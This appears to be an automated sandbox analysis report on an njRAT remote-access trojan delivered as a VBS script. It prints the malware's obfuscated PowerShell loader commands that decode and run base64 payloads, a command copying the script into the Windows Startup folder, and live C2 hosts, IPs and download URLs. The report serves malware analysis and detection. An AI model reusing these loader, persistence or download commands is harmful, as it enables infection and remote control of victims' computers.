?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHg

Sigma detected: FromBase64String Command Line

Source: Process started

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ??

Sigma detected: Suspicious PowerShell Cmdline

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? QBwbzM?? ?? ?? oUGI0X?? ?? ?? BJRYJch0B?? H?

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHg

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4560, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs'), ProcessId: 6844

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132899285566958803.6844.DefaultAppDomain.powershell

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 22.0.RegSvcs.exe.400000.1.unpack

Malware Configuration Extractor: Njrat {"Host": "venomsi.mypsx.net", "Port": "81", "Mutex Name": "4c6c9a1bbdc34e6ebe", "Network Seprator": "@!#&^%$", "Campaign ID": "NYAN CAT", "Version": "0.7NC"}

Multi AV Scanner detection for submitted file

Source: NJratccccassssG2.00.vbs	Virustotal: Detection: 29%	Perma Link
Source: NJratccccassssG2.00.vbs	Metadefender: Detection: 14%	Perma Link
Source: NJratccccassssG2.00.vbs	ReversingLabs: Detection: 25%

Yara detected Njrat

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR

Antivirus detection for URL or domain

Source: http://198.50.177.251/rump/4.txt

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: venomsi.mypsx.net	Virustotal: Detection: 10%			Perma Link
Source: venomsi.mypsx.net	Virustotal: Detection: 10%			Perma Link

Source: 22.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.3.unpack	Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Dropper.Gen7
Source: 22.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 22.0.RegSvcs.exe.400000.4.unpack	Avira: Label: TR/Dropper.Gen7

Source:	Binary string: e.pdb source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ib.pdbCk source: powershell.exe, 00000018.00000002.403195364.0000019760B80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automationlib.pdb/E source: powershell.exe, 00000018.00000003.382609842.000001976081F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.403084712.000001976081F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Hacking\Crypters Modding\ClassLibrary3\ClassLibrary3\obj\Release\lpOUplMp.pdb source: powershell.exe, 00000010.00000002.354455208.000002164DC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: jICudHOL.pdb source: powershell.exe, 00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357618096.0000021665FB0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: venomsi.mypsx.net

Source: Joe Sandbox View

ASN Name: UninetSAdeCVMX UninetSAdeCVMX

Source: global traffic	HTTP traffic detected: GET /rump/4.txt HTTP/1.1Host: 198.50.177.251Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /NJratNEW%20casa/base%2064%20NJratNEWcasa.txt HTTP/1.1Host: njratcasanew.ueuo.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 198.50.177.251 198.50.177.251

Source: global traffic

TCP traffic: 192.168.2.3:49757 -> 201.121.59.253:81

Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
